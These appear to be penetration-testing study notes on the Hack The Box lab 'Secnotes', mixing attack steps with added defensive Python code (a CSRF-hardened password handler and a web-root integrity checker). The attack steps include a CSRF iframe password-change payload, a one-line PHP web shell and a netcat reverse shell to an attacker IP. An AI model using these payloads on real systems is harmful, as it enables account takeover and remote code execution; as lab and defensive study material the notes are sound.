OSCP Notes

HTB Secnotes -SQL injection & CSRF

xss vuln ---
What requests are being sent?
direct URL? --> put "http://Attackers_IP:9001" in a comment section and see what it does!
nc -nvlp 9001
got a connection back!
create a test page
<iframe src="http://Attacker_IP/change_pass.php?password=gori&confirm_password=gori&submit"></iframe>
host the page on a Python http.server and see what it does --> does the link actually work?
if it works, this would change the password of the particular user account, e.g. admin's
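Why the iframe trick above works, and what stops it, as an added illustration (not the Secnotes app's code, which is PHP; this is a Python stand-in). The weak handler accepts the password change on any request method with no proof that the user intended it, so a GET fired from an iframe src the victim merely renders is enough because the browser attaches the session cookie. The hardened handler requires POST, a per-session CSRF token compared in constant time, re-entry of the current password, and rotates the token after use. `session`, `users`, the hostname `secnotes.example` and the PBKDF2 storage format are constructed for the example.

```python
"""Password-change endpoint: the CSRF-able shape beside a hardened one.

Constructed stand-ins: `session` is a dict playing the role of the server-side
session ($_SESSION in the PHP app), `users` a dict playing the role of the user
table. Neither is the Secnotes application's own code.
"""
import hashlib
import hmac
import secrets
from typing import Dict, Optional, Tuple

Response = Tuple[int, str]


def hash_password(password: str, salt: Optional[bytes] = None) -> str:
    """PBKDF2-SHA256, stored as hex(salt):hex(digest)."""
    salt = salt or secrets.token_bytes(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)
    return salt.hex() + ":" + digest.hex()


def verify_password(password: str, stored: str) -> bool:
    salt_hex, digest_hex = stored.split(":", 1)
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), 100_000)
    return hmac.compare_digest(candidate.hex(), digest_hex)


def vulnerable_change_password(method: str, params: Dict[str, str],
                               session: Dict[str, str], users: Dict[str, str]) -> Response:
    """The handler shape the iframe abuses: any method, no token, no re-auth.

    The victim's browser sends the session cookie with the GET the iframe
    triggers, so the server cannot tell it from a deliberate form submit."""
    user = session.get("user")
    if user is None:
        return 401, "login required"
    new = params.get("password", "")
    if new and new == params.get("confirm_password"):
        users[user] = hash_password(new)
        return 200, "password changed"
    return 400, "passwords do not match"


def issue_csrf_token(session: Dict[str, str]) -> str:
    """Called when rendering the change-password form; token lives in the session."""
    token = secrets.token_hex(32)
    session["csrf_token"] = token
    return token


def hardened_change_password(method: str, params: Dict[str, str],
                             session: Dict[str, str], users: Dict[str, str],
                             origin: Optional[str] = None,
                             site_origin: str = "https://secnotes.example") -> Response:
    user = session.get("user")
    if user is None:
        return 401, "login required"
    if method != "POST":
        return 405, "state change requires POST"  # an <iframe>/<img> src GET stops here
    expected = session.get("csrf_token")
    supplied = params.get("csrf_token", "")
    if not expected or not hmac.compare_digest(expected, supplied):
        return 403, "missing or invalid CSRF token"  # cross-site page cannot read the token
    if origin is not None and origin != site_origin:
        return 403, "cross-site origin"  # secondary check when the browser sends Origin
    stored = users.get(user)
    if stored is None or not verify_password(params.get("current_password", ""), stored):
        return 403, "current password incorrect"  # re-auth: attacker does not know it
    new = params.get("password", "")
    if not new or new != params.get("confirm_password"):
        return 400, "passwords do not match"
    users[user] = hash_password(new)
    session["csrf_token"] = secrets.token_hex(32)  # rotate so a captured token cannot be replayed
    return 200, "password changed"


if __name__ == "__main__":
    # The query string from the iframe above, replayed against both handlers.
    forged = {"password": "gori", "confirm_password": "gori", "submit": ""}
    users = {"admin": hash_password("original")}
    session = {"user": "admin"}
    print("weak   :", vulnerable_change_password("GET", forged, session, users))
    print("hardened:", hardened_change_password("GET", forged, session, users))
```

Both calls in the `__main__` block use the exact parameters the iframe carries; only the weak handler changes the password. A legitimate submit from the site's own form succeeds against the hardened handler because it carries the session's token and the user's current password.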
IIS server open and you have a smb share access on the web root.
try to create a web shell and upload it > access it!
<?php system($_REQUEST['ippsec']); ?>
RCE confirmed?
Uploading nc.exe (search for nc64.exe) tends to give a stable shell on Windows!
nc.exe attacker_IP 9001 -e powershell
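The control that would have caught the step above: a writable SMB share on the IIS web root means any new script file becomes executable by the web server. This added example (not from the notes or the box) keeps a SHA-256 manifest of the web root and, on each run, reports added or modified files, prioritising script extensions. The directory layout, file names and the `uploads/` folder are constructed for the demo.

```python
"""Web-root integrity baseline: detect script files dropped via a writable share.

Constructed example; paths, file names and extension list are assumptions.
"""
import hashlib
import tempfile
from pathlib import Path
from typing import Dict, List

# Extensions IIS (or a PHP handler behind it) will execute; extend to match the server.
SCRIPT_EXTENSIONS = {".php", ".asp", ".aspx", ".ashx", ".asmx", ".jsp"}


def build_manifest(root: Path) -> Dict[str, str]:
    """Relative POSIX path -> SHA-256 of file content, for every file under root."""
    manifest: Dict[str, str] = {}
    for path in sorted(root.rglob("*")):
        if path.is_file():
            rel = path.relative_to(root).as_posix()
            manifest[rel] = hashlib.sha256(path.read_bytes()).hexdigest()
    return manifest


def diff_manifest(baseline: Dict[str, str], current: Dict[str, str]) -> Dict[str, List[str]]:
    """Classify every path as added, removed or modified relative to the baseline."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    modified = sorted(p for p in baseline if p in current and baseline[p] != current[p])
    return {"added": added, "removed": removed, "modified": modified}


def flag_script_changes(diff: Dict[str, List[str]]) -> List[str]:
    """Highest-priority alerts: new or changed files the web server would execute."""
    return sorted(p for p in diff["added"] + diff["modified"]
                  if Path(p).suffix.lower() in SCRIPT_EXTENSIONS)


def demo() -> List[str]:
    """Build a constructed web root, baseline it, then 'upload' a shell over the share."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "index.php").write_text("<?php echo 'notes'; ?>")
        (root / "style.css").write_text("body {}")
        baseline = build_manifest(root)          # taken at deploy time, stored off-box

        # What the writable share lets an attacker do: drop one new script file.
        (root / "uploads").mkdir()
        (root / "uploads" / "shell.php").write_text("<?php /* dropped file */ ?>")

        current = build_manifest(root)           # taken by the scheduled check
        return flag_script_changes(diff_manifest(baseline, current))


if __name__ == "__main__":
    print("script files to investigate:", demo())  # ['uploads/shell.php']
```

Run this on a schedule (or from a file-system watcher) with the baseline stored somewhere the share cannot reach; the same comparison, plus a write-ACL review on the share, is the check that turns "SMB share on the web root" from a foothold into an alert.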
lnk found?
Get-Content ~.lnk
admin password was hidden inside of it > psexec win!